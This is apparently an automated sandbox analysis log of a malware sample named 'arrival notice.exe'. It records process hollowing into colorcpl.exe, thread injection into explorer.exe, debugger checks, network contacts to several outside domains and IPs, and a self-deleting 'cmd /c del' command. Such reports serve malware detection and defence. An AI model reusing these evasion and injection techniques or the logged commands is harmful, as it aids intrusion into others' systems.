          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4C962 mov eax, dword ptr fs:[00000030h]10_2_04B4C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B67D50 mov eax, dword ptr fs:[00000030h]10_2_04B67D50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6B944 mov eax, dword ptr fs:[00000030h]10_2_04B6B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6B944 mov eax, dword ptr fs:[00000030h]10_2_04B6B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18D34 mov eax, dword ptr fs:[00000030h]10_2_04C18D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B83D43 mov eax, dword ptr fs:[00000030h]10_2_04B83D43
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC3540 mov eax, dword ptr fs:[00000030h]10_2_04BC3540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5AAB0 mov eax, dword ptr fs:[00000030h]10_2_04B5AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5AAB0 mov eax, dword ptr fs:[00000030h]10_2_04B5AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7FAB0 mov eax, dword ptr fs:[00000030h]10_2_04B7FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B452A5 mov eax, dword ptr fs:[00000030h]10_2_04B452A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B452A5 mov eax, dword ptr fs:[00000030h]10_2_04B452A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B452A5 mov eax, dword ptr fs:[00000030h]10_2_04B452A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B452A5 mov eax, dword ptr fs:[00000030h]10_2_04B452A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B452A5 mov eax, dword ptr fs:[00000030h]10_2_04B452A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18ED6 mov eax, dword ptr fs:[00000030h]10_2_04C18ED6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC46A7 mov eax, dword ptr fs:[00000030h]10_2_04BC46A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7D294 mov eax, dword ptr fs:[00000030h]10_2_04B7D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7D294 mov eax, dword ptr fs:[00000030h]10_2_04B7D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDFE87 mov eax, dword ptr fs:[00000030h]10_2_04BDFE87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72AE4 mov eax, dword ptr fs:[00000030h]10_2_04B72AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B716E0 mov ecx, dword ptr fs:[00000030h]10_2_04B716E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B576E2 mov eax, dword ptr fs:[00000030h]10_2_04B576E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C10EA5 mov eax, dword ptr fs:[00000030h]10_2_04C10EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C10EA5 mov eax, dword ptr fs:[00000030h]10_2_04C10EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C10EA5 mov eax, dword ptr fs:[00000030h]10_2_04C10EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B736CC mov eax, dword ptr fs:[00000030h]10_2_04B736CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72ACB mov eax, dword ptr fs:[00000030h]10_2_04B72ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFFEC0 mov eax, dword ptr fs:[00000030h]10_2_04BFFEC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B88EC7 mov eax, dword ptr fs:[00000030h]10_2_04B88EC7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFFE3F mov eax, dword ptr fs:[00000030h]10_2_04BFFE3F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4E620 mov eax, dword ptr fs:[00000030h]10_2_04B4E620
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B84A2C mov eax, dword ptr fs:[00000030h]10_2_04B84A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B84A2C mov eax, dword ptr fs:[00000030h]10_2_04B84A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4AA16 mov eax, dword ptr fs:[00000030h]10_2_04B4AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4AA16 mov eax, dword ptr fs:[00000030h]10_2_04B4AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18A62 mov eax, dword ptr fs:[00000030h]10_2_04C18A62
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B45210 mov eax, dword ptr fs:[00000030h]10_2_04B45210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B45210 mov ecx, dword ptr fs:[00000030h]10_2_04B45210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B45210 mov eax, dword ptr fs:[00000030h]10_2_04B45210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B45210 mov eax, dword ptr fs:[00000030h]10_2_04B45210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B63A1C mov eax, dword ptr fs:[00000030h]10_2_04B63A1C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A61C mov eax, dword ptr fs:[00000030h]10_2_04B7A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A61C mov eax, dword ptr fs:[00000030h]10_2_04B7A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4C600 mov eax, dword ptr fs:[00000030h]10_2_04B4C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4C600 mov eax, dword ptr fs:[00000030h]10_2_04B4C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4C600 mov eax, dword ptr fs:[00000030h]10_2_04B4C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B78E00 mov eax, dword ptr fs:[00000030h]10_2_04B78E00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B58A0A mov eax, dword ptr fs:[00000030h]10_2_04B58A0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8927A mov eax, dword ptr fs:[00000030h]10_2_04B8927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6AE73 mov eax, dword ptr fs:[00000030h]10_2_04B6AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6AE73 mov eax, dword ptr fs:[00000030h]10_2_04B6AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6AE73 mov eax, dword ptr fs:[00000030h]10_2_04B6AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6AE73 mov eax, dword ptr fs:[00000030h]10_2_04B6AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6AE73 mov eax, dword ptr fs:[00000030h]10_2_04B6AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01608 mov eax, dword ptr fs:[00000030h]10_2_04C01608
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5766D mov eax, dword ptr fs:[00000030h]10_2_04B5766D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFB260 mov eax, dword ptr fs:[00000030h]10_2_04BFB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFB260 mov eax, dword ptr fs:[00000030h]10_2_04BFB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BD4257 mov eax, dword ptr fs:[00000030h]10_2_04BD4257
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49240 mov eax, dword ptr fs:[00000030h]10_2_04B49240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49240 mov eax, dword ptr fs:[00000030h]10_2_04B49240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49240 mov eax, dword ptr fs:[00000030h]10_2_04B49240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49240 mov eax, dword ptr fs:[00000030h]10_2_04B49240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B57E41 mov eax, dword ptr fs:[00000030h]10_2_04B57E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74BAD mov eax, dword ptr fs:[00000030h]10_2_04B74BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74BAD mov eax, dword ptr fs:[00000030h]10_2_04B74BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74BAD mov eax, dword ptr fs:[00000030h]10_2_04B74BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72397 mov eax, dword ptr fs:[00000030h]10_2_04B72397
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B58794 mov eax, dword ptr fs:[00000030h]10_2_04B58794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7B390 mov eax, dword ptr fs:[00000030h]10_2_04B7B390
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7794 mov eax, dword ptr fs:[00000030h]10_2_04BC7794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7794 mov eax, dword ptr fs:[00000030h]10_2_04BC7794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7794 mov eax, dword ptr fs:[00000030h]10_2_04BC7794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B51B8F mov eax, dword ptr fs:[00000030h]10_2_04B51B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B51B8F mov eax, dword ptr fs:[00000030h]10_2_04B51B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFD380 mov ecx, dword ptr fs:[00000030h]10_2_04BFD380
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0138A mov eax, dword ptr fs:[00000030h]10_2_04C0138A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B837F5 mov eax, dword ptr fs:[00000030h]10_2_04B837F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6DBE9 mov eax, dword ptr fs:[00000030h]10_2_04B6DBE9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C15BA5 mov eax, dword ptr fs:[00000030h]10_2_04C15BA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC53CA mov eax, dword ptr fs:[00000030h]10_2_04BC53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC53CA mov eax, dword ptr fs:[00000030h]10_2_04BC53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7E730 mov eax, dword ptr fs:[00000030h]10_2_04B7E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18B58 mov eax, dword ptr fs:[00000030h]10_2_04C18B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B44F2E mov eax, dword ptr fs:[00000030h]10_2_04B44F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B44F2E mov eax, dword ptr fs:[00000030h]10_2_04B44F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6F716 mov eax, dword ptr fs:[00000030h]10_2_04B6F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18F6A mov eax, dword ptr fs:[00000030h]10_2_04C18F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDFF10 mov eax, dword ptr fs:[00000030h]10_2_04BDFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDFF10 mov eax, dword ptr fs:[00000030h]10_2_04BDFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A70E mov eax, dword ptr fs:[00000030h]10_2_04B7A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A70E mov eax, dword ptr fs:[00000030h]10_2_04B7A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1070D mov eax, dword ptr fs:[00000030h]10_2_04C1070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1070D mov eax, dword ptr fs:[00000030h]10_2_04C1070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B73B7A mov eax, dword ptr fs:[00000030h]10_2_04B73B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B73B7A mov eax, dword ptr fs:[00000030h]10_2_04B73B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4DB60 mov ecx, dword ptr fs:[00000030h]10_2_04B4DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5FF60 mov eax, dword ptr fs:[00000030h]10_2_04B5FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0131B mov eax, dword ptr fs:[00000030h]10_2_04C0131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4F358 mov eax, dword ptr fs:[00000030h]10_2_04B4F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4DB40 mov eax, dword ptr fs:[00000030h]10_2_04B4DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5EF40 mov eax, dword ptr fs:[00000030h]10_2_04B5EF40
          Source: C:\Users\user\Desktop\arrival notice.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00409B30 LdrLoadDll,3_2_00409B30
          Source: C:\Users\user\Desktop\arrival notice.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.beerenhunger.info
          Source: C:\Windows\explorer.exeDomain query: www.ilovecoventry.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mybenefits51.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.singisa4letterword.com
          Source: C:\Windows\explorer.exeDomain query: www.petrosterzis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.150 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\arrival notice.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: DD0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\arrival notice.exeMemory written: C:\Users\user\Desktop\arrival notice.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\arrival notice.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\arrival notice.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Users\user\Desktop\arrival notice.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
